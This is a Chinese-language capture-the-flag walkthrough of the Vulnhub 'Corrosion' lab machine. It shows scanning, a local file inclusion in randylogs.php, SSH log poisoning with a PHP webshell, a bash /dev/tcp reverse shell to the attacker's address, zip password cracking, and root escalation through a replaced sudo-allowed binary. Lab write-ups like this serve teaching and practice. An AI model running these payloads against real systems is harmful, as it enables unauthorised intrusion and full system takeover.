首页 > 其他分享 >Vulnhub: Corrosion靶机

Vulnhub: Corrosion靶机

时间:2023-06-21 23:11:52浏览次数:43  
标签:Corrosion .. 192.168 randy ssh easysysinfo 靶机 111.130 Vulnhub

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.130

image

目录爆破

image

blog-post目录下存在两个目录

image

对archives目录中的randylogs.php进行测试发现存在文件包含

wfuzz -c -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/burp-parameter-names.txt --hc 404 --hh 0 http://192.168.111.130/blog-post/archives/randylogs.php?FUZZ=../../../../../../../../../../../../../etc/passwd

image

漏洞利用

成功包含ssh日志

http://192.168.111.130/blog-post/archives/randylogs.php?file=../../../../../../../../../var/log/auth.log

image

利用ssh写入webshell到ssh日志文件中,再配合文件包含拿shell

ssh '<?php system($_GET["cmd"]);?>'@192.168.111.130

image

文件包含ssh日志文件执行反弹shell

#需要进行url编码
bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'

image

提权

在/var/backups目录下发现user_backup.zip压缩包

image

解压发现需要密码,把文件下载到本地爆破

zip2john user_backup.zip > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

image

解压后发现私钥文件和密码

image

利用私钥登录randy用户

ssh [email protected] -i id_rsa

image

randy用户sudo权限

image

查看/usr/randy/tools/easysysinfo.py后尝试修改环境变量提权,但没有成功,用c语言写一个程序替代easysysinfo

#include<stdlib.h>
int main()
{
	setuid(0);
	setgid(0);
	system("/bin/bash");
}

gcc编译后执行,提升为root

gcc a.c -o easysysinfo
sudo -u root /home/randy/tools/easysysinfo

image

image

flag

image

标签:Corrosion,..,192.168,randy,ssh,easysysinfo,靶机,111.130,Vulnhub
From: https://www.cnblogs.com/ctostm/p/17497271.html

相关文章

  • 渗透笔记:vulnhub靶机drippingblues--第一篇测试记录
    在不知道靶场的ip情况下进行扫描 出现有几个ip,但是不知道哪个是的,所以就一个个试一试namp-T4-sV-A-O-p- 192.168.13.143-T4(速度) -sV(版本扫描和开启的服务) -O(操作系统) -p-(所有端口)扫了好几个,只有一个是的,所以不是的就没有发出来了 ftp一下ip,发现有一......
  • Vulnhub: ICA:1靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130访问目标80,发现目标CMS为qdPM9.2搜索对应漏洞发现存在信息泄露searchsploitqdpm访问192.168.111.130/core/config/databases.yml得到目标......
  • 靶机2020web隐藏信息探索
     个人感觉这套做题法是非常快的,本文可能有点啰嗦,请各位务必耐心看完,相信看完的各位一定会有所学成! #绿色字体代表解析,红色字体是答案,橙色代表方法一,通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行访问,找到登录界面中的FLAG,并将FLAG提交直接在url里面输入靶机I......
  • VulnHub-Bob: 1.0.1
    靶机地址:https://www.vulnhub.com/entry/bob-101,226/目标:YourGoalistogettheflagin/提示:Remembertolookforhiddeninfo/files一、信息收集1、主机及服务发现1.1主机扫描使用arp-scan确定目标靶机(192.168.0.10)arp-scan-l┌──(root㉿kali)-[~]└─#......
  • Vulnhub之Connect The Dots靶机详细测试过程
    ConnectTheDots识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts......
  • Vulnhub: Mission-Pumpkin v1.0: PumpkinGarden靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130在1515网站的img目录下的hidden_secret/目录中存在clue.txtbase64解密后得到scarecrow:5Qn@$y使用用户:scarecrow,密码:5Qn@$y,登录目标sshsshs......
  • Vulnhub: HA: ISRO靶机
    kali:192.168.111.111靶机:192.168.111.134信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.134目录爆破,发现存在connect.phpferoxbuster-k-d1--urlhttp://192.168.111.134-w/opt/zidian/SecLists-2022.2/Discovery/Web-Content/directo......
  • vbox和vmware靶机搭建
    靶机:vmbox  kali:vmware首先在VMware上虚拟网络编辑器中选中一个虚拟网络选择桥接模式,桥接到virtualbox的虚拟网卡上。打开kali的虚拟机设置,自定义网络里面,选中网络适配器选择刚刚桥接到virtualbox的网络,注意最好再加一块网卡选择NAT模式的网络连接外网。virtualbox(我是6.1版......
  • vul -- Cybero靶机渗透
    (ps:做这个靶机时参考了很多大佬的文章,有些地方属于自己抠破头破也想不到,还有这篇文件就是对自己学习的一个记录,大佬们轻点喷)信息收集先获取靶机IP,这里也可以使用arp-scan获取靶机IP 获取到靶机IP为172.16.6.207,使用nmap对靶机进行更详细的信息扫描nmap-A-p--T5172.16.6......
  • Vulnhub: dpwwn: 1靶机
    kali:192.168.111.111靶机:192.168.111.131信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.131爆破出mysql的root用户为空密码hydra-lroot-P/usr/share/wordlists/rockyou.txt192.168.111.131-s3306mysql-t64在mysql数据库中发现......